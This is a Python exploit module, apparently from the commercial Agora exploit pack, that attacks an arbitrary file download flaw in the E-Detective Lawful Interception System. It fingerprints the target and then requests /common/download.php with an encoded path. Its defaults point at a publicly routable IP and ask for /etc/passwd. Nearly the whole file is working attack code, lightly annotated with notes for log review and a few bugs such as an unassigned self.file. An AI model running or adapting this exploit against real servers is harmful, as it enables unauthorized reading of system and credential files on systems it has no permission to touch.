#!/usr/bin/env python
# The exploit is a part of Agora pack - use only under the license agreement
# specified in LICENSE.txt in your Agora distribution
import sys
import re
import os
import urllib2
import base64
sys.path.append("./core")
from Sploit import Sploit
# Module metadata read by the Agora framework.
INFO = {
    'NAME': "se_e-detective_afd",
    'DESCRIPTION': "E-Detective Lawful Interception System Arbitrary File Download",
    'VENDOR': "http://www.edecision4u.com/",
    "CVE Name": "N/A",
    "NOTES": "\nArbitrary File Download Exploit\nTested on Online Demo Site.\n",
    'CHANGELOG': "14 July, 2015. Written by Gleg team.",
    'PATH': "Exploits/",
}

# Must be in every module, to be set by framework
# Author-shipped defaults. HOST is a publicly routable address rather than a
# lab placeholder; PORT is kept as a string and converted with int() in
# exploit.args(); FILENAME is the server-side path that gets requested.
OPTIONS = {
    "HOST": "60.251.127.211",
    "PORT": "13443",
    "FILENAME": "/etc/passwd",
    "SSL": True,
}
class exploit(Sploit):
    """Agora module for the file-download issue named in INFO['DESCRIPTION'].

    Traffic generated by this class, as visible in the code below:

    * a GET of the base URL, whose body is searched for ``log_info.php``
      (product fingerprint);
    * a GET of ``/common/download.php?file=<token>``, where the token is the
      requested path with 40 added to every character code and the result
      base64-encoded.

    Both requests are plain ``urllib2.urlopen`` calls; as far as this file
    shows, no cookie, header or credential is attached to either of them.
    For log review, a token can be reversed (base64-decode, then subtract 40
    per byte) to recover the path that was requested.
    """

    def __init__(self, host="", port=0, fileDownload="", ssl=True,
                 logger=None):
        """Store the connection settings and mark the module as running.

        host and port are later combined into the base URL by args(),
        fileDownload is kept as ``self.filed``, ssl selects https over http,
        and logger is passed through to the Sploit base class.
        """
        Sploit.__init__(self, logger=logger)
        self.name = INFO['NAME']
        self.state = "running"
        self.url = ""
        self.host, self.port = host, port
        self.filed, self.ssl = fileDownload, ssl

    def args(self):
        """Apply the values returned by Sploit.args and rebuild the base URL.

        The object returned by ``Sploit.args(self, OPTIONS)`` is stored on
        ``self.args``, so after the first call the instance attribute holds
        that object instead of this bound method.
        """
        opts = Sploit.args(self, OPTIONS)
        self.args = opts
        self.host = opts.get('HOST', self.host)
        self.port = int(opts.get('PORT', self.port))
        self.filed = opts.get('FILENAME', self.filed)
        self.ssl = opts.get('SSL', self.ssl)
        scheme = "https://" if self.ssl else "http://"
        self.url = scheme + self.host + ":" + str(self.port)

    def check(self):
        """Fingerprint the target; return 1 on a match and 0 otherwise.

        The base URL is fetched once and the response body is searched for
        the string ``log_info.php``.  A URLError is logged (reason first,
        else HTTP code) and treated as "no match".
        """
        self.args()
        # Quick banner check.
        self.log("Testing %s:%d" % (self.host, self.port))
        try:
            response = urllib2.urlopen(self.url)
        except urllib2.URLError as er:
            if hasattr(er, 'reason'):
                self.log(er.reason)
            elif hasattr(er, 'code'):
                self.log("Error code: %s" % er.code)
            return 0
        if "log_info.php" not in response.read():
            return 0
        self.log("Found e-detective server")
        return 1

    def encode(self, text):
        """Return *text* in the form carried by the ``file`` query parameter.

        Each character code is raised by 40 and the resulting string is
        base64-encoded.  This is an encoding, not a secret: decoding and
        subtracting 40 yields the original path, which is what a log-review
        rule would compare against the directories the endpoint is meant to
        serve.
        """
        shifted = ''.join(chr(ord(ch) + 40) for ch in text)
        return base64.b64encode(shifted)

    def download(self):
        """Request the encoded path from /common/download.php and log the body.

        The path is read from ``self.file``; that attribute is not assigned
        anywhere in this class.  The method sets ``self.state`` to "success"
        and returns 1; it has no return-0 path, so a failed request surfaces
        as an exception from urlopen rather than as a falsy result.
        """
        self.log('attacking (in progress)')
        self.log('Try to download file: {}'.format(self.file))
        token = self.encode(self.file)
        response = urllib2.urlopen(
            self.url + "/common/download.php?file=" + token)
        self.log('===Content of file===')
        self.log(response.read())
        self.log('=========End=========')
        self.log('Attacking (succeeded)')
        self.state = "success"
        return 1

    def run(self):
        """Run check() and then download(), reporting through finish().

        Returns 1 when both stages return a truthy value; otherwise logs the
        stage's failure message, calls finish(False) and returns 0.
        """
        stages = (
            (self.check, "Testing didn't find vulnerable target"),
            (self.download, "Failed"),
        )
        for stage, failure_message in stages:
            if not stage():
                self.log(failure_message)
                self.finish(False)
                return 0
        self.log("Done.")
        self.finish(True)
        return 1
if __name__ == '__main__':
    # Only the framework-driven ("tool") mode exists so far; a standalone
    # mode is planned but not implemented.
    print("Running exploit %s .. " % INFO['NAME'])
    module = exploit("192.168.0.1", 80)
    module.run()